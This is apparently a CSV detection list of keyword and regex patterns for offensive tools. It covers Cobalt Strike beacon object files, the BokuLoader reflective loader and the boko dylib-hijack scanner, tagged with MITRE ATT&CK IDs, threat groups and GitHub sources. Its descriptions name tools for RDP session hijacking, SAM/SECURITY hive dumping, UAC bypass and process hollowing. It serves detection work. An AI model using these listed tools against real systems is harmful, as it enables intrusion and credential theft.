"*bof-quser *.*",".{0,1000}bof\-quser\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-quser.cna*",".{0,1000}bof\-quser\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" 
"*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*bof-regsave *",".{0,1000}bof\-regsave\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object 
File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*BofRunnerOutput*",".{0,1000}BofRunnerOutput.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*BOFs*/SyscallsSpawn/*",".{0,1000}BOFs.{0,1000}\/SyscallsSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*Bofs/AssemblyLoader*",".{0,1000}Bofs\/AssemblyLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bof-servicemove *",".{0,1000}bof\-servicemove\s.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*bof-trustedpath-uacbypass*",".{0,1000}bof\-trustedpath\-uacbypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*boko.py *",".{0,1000}boko\.py\s.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 
- T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*bokoscanner.*",".{0,1000}bokoscanner\..{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*boku_pe_customMZ*",".{0,1000}boku_pe_customMZ.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_customPE*",".{0,1000}boku_pe_customPE.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_dll*",".{0,1000}boku_pe_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_mask_*",".{0,1000}boku_pe_mask_.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_pe_MZ_from_C2Profile*",".{0,1000}boku_pe_MZ_from_C2Profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku_strrep*",".{0,1000}boku_strrep.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku7/BokuLoader*",".{0,1000}boku7\/BokuLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*boku7/HOLLOW*",".{0,1000}boku7\/HOLLOW.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*BokuLoader.cna*",".{0,1000}BokuLoader\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*BokuLoader.exe*",".{0,1000}BokuLoader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" 